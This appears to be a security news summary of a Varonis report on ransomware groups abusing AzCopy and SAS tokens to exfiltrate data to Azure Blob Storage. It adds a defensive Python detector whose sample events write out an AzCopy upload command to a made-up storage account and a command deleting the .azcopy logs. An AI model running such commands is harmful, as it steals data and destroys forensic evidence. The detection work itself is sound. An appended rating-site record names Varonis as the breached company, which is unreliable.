Varonis Threat Labs: Trusted Azure Utility AzCopy Turned into Data Exfiltration Tool in Active Ransomware Campaigns

Ransomware Operators Exploit Microsoft’s AzCopy for Stealthy Data Theft

Ransomware groups are increasingly weaponizing legitimate IT tools to evade detection, with Microsoft’s AzCopy, a command-line utility for Azure data transfers, now a favored method for exfiltrating sensitive files before encryption. This tactic allows attackers to blend malicious activity with routine cloud operations, making detection difficult for security teams.

How the Attack Works
AzCopy, designed for enterprise data migration, operates as a standalone executable over HTTPS and, because of its trusted status, does not trigger traditional Endpoint Detection and Response (EDR) alerts. Threat actors generate Shared Access Signature (SAS) tokens (temporary, credential-free URLs) to route stolen data to attacker-controlled Azure Blob Storage accounts. These tokens, active for as little as three days and eight hours, limit exposure while enabling large-scale transfers.

Attackers further refine their approach by:

  • Using --include-after to target only recently modified files.
  • Throttling upload speeds with --cap-mbps to avoid triggering network anomaly alerts.
  • Deleting AzCopy’s hidden log directory (.azcopy) post-exfiltration to erase forensic evidence.

Impact and Detection Challenges
The shift to Azure-based exfiltration complicates defense efforts. Since data flows through Microsoft’s infrastructure, it mimics legitimate business traffic, delaying detection until stolen files appear on ransomware leak sites. Varonis Threat Labs identified multiple incidents where AzCopy went undetected by EDR platforms, underscoring the tactic’s effectiveness.

Organizations are advised to monitor outbound connections to *.blob.core.windows.net from non-Azure systems and leverage User and Entity Behavior Analytics (UEBA) to flag unusual file access patterns. However, the attack’s stealthy nature highlights the growing sophistication of ransomware operations leveraging trusted tools.
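The following detection sketch is an added example, not code from Varonis or the source article. It runs over constructed endpoint and network events and flags the three behaviours described above: Blob Storage connections from hosts outside an assumed allowlist of Azure-integrated systems, AzCopy invocations carrying --include-after or --cap-mbps (plus a SAS-style URL), and deletion of the .azcopy log directory. Hostnames, the storage account names and the allowlist are made up.

```python
import re

# Constructed sample telemetry, one event per line: "<kind>|<host>|<detail>".
# Hosts, storage account names, paths and the SAS URL are made up for the example.
SAMPLE_EVENTS = [
    "proc|ws-finance-07|azcopy.exe copy D:\\Shares\\Legal "
    "\"https://acmestor.blob.core.windows.net/c1?sv=2023-11-03&se=2026-03-10T00%3A00Z&sp=w&sig=REDACTED\" "
    "--recursive --include-after 2026-03-01T00:00:00Z --cap-mbps 20",
    "net|ws-finance-07|dst=acmestor.blob.core.windows.net:443",
    "net|backup-az-01|dst=corpbackup.blob.core.windows.net:443",
    "proc|ws-hr-03|cmd.exe /c rmdir /s /q C:\\Users\\jsmith\\.azcopy",
    "net|ws-dev-11|dst=update.microsoft.com:443",
]

# Assumed allowlist of systems that legitimately talk to Blob Storage (e.g. Azure backup agents).
AZURE_INTEGRATED_HOSTS = {"backup-az-01"}

BLOB_HOST = re.compile(r"\b[a-z0-9]+\.blob\.core\.windows\.net\b", re.I)
SAS_QUERY = re.compile(r"[?&](?:sig|se|sp)=", re.I)      # SAS token query parameters in a URL
EVASION_FLAGS = ("--include-after", "--cap-mbps")        # the flags called out in the report
LOG_CLEANUP = re.compile(r"\b(rmdir|rd|del|remove-item|rm)\b.*\.azcopy", re.I)


def analyse(events):
    """Return (host, rule, detail) findings, in event order."""
    findings = []
    for line in events:
        kind, host, detail = line.split("|", 2)
        if kind == "net":
            m = BLOB_HOST.search(detail)
            if m and host not in AZURE_INTEGRATED_HOSTS:
                findings.append((host, "blob_from_unexpected_host", m.group(0)))
        elif kind == "proc":
            low = detail.lower()
            if "azcopy" in low and any(f in low for f in EVASION_FLAGS):
                flags = [f for f in EVASION_FLAGS if f in low]
                if SAS_QUERY.search(detail):
                    flags.append("sas-url")
                findings.append((host, "azcopy_evasion_flags", ",".join(flags)))
            if LOG_CLEANUP.search(detail):
                findings.append((host, "azcopy_log_cleanup", detail))
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_EVENTS):
        print(finding)
```

The allowlisted backup host produces no finding, which is the point of tying the Blob Storage rule to an inventory of systems expected to use Azure rather than alerting on every *.blob.core.windows.net connection.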

Source: https://cybersecuritynews.com/trusted-azure-utility-azcopy-turned/

Varonis cybersecurity rating report: https://www.rankiteo.com/company/varonis

{
  "id": "VAR1772634393",
  "linkid": "varonis",
  "type": "Cyber Attack",
  "date": "3/2026",
  "severity": "85",
  "impact": "4",
  "explanation": "Attack with significant impact with customers data leaks"
}

{
  "attack_vector": "Legitimate IT tool exploitation (AzCopy)",
  "data_breach": {
    "data_encryption": true,
    "data_exfiltration": true,
    "sensitivity_of_data": "High (exfiltrated before encryption)",
    "type_of_data_compromised": "Sensitive files"
  },
  "description": "Ransomware groups are increasingly weaponizing legitimate IT tools to evade detection, with Microsoft’s AzCopy—a command-line utility for Azure data transfers—now a favored method for exfiltrating sensitive files before encryption. This tactic allows attackers to blend malicious activity with routine cloud operations, making detection difficult for security teams.",
  "impact": {
    "data_compromised": "Sensitive files exfiltrated",
    "operational_impact": "Delayed detection due to stealthy exfiltration"
  },
  "lessons_learned": "Legitimate IT tools like AzCopy can be weaponized for stealthy data exfiltration, evading traditional EDR detection. Organizations must monitor outbound cloud traffic and implement UEBA to detect anomalous file access patterns.",
  "motivation": "Financial gain (ransomware extortion)",
  "post_incident_analysis": {
    "corrective_actions": [
      "Enhanced monitoring of cloud data transfers",
      "UEBA implementation for anomaly detection",
      "Restriction of SAS token usage"
    ],
    "root_causes": "Abuse of trusted cloud tools (AzCopy) and SAS tokens for stealthy exfiltration"
  },
  "ransomware": {"data_encryption": true, "data_exfiltration": true},
  "recommendations": [
    "Monitor outbound connections to *.blob.core.windows.net from non-Azure systems",
    "Leverage User and Entity Behavior Analytics (UEBA) to flag unusual file access patterns",
    "Restrict or audit the use of Shared Access Signature (SAS) tokens",
    "Implement throttling controls to detect abnormal data transfer speeds",
    "Enhance logging and retention for cloud-based data transfers"
  ],
  "references": [{"source": "Varonis Threat Labs"}],
  "response": {
    "enhanced_monitoring": "Monitor outbound connections to *.blob.core.windows.net; leverage User and Entity Behavior Analytics (UEBA)"
  },
  "title": "Ransomware Operators Exploit Microsoft’s AzCopy for Stealthy Data Theft",
  "type": "Ransomware",
  "vulnerability_exploited": "Abuse of Shared Access Signature (SAS) tokens and trusted cloud tools"
}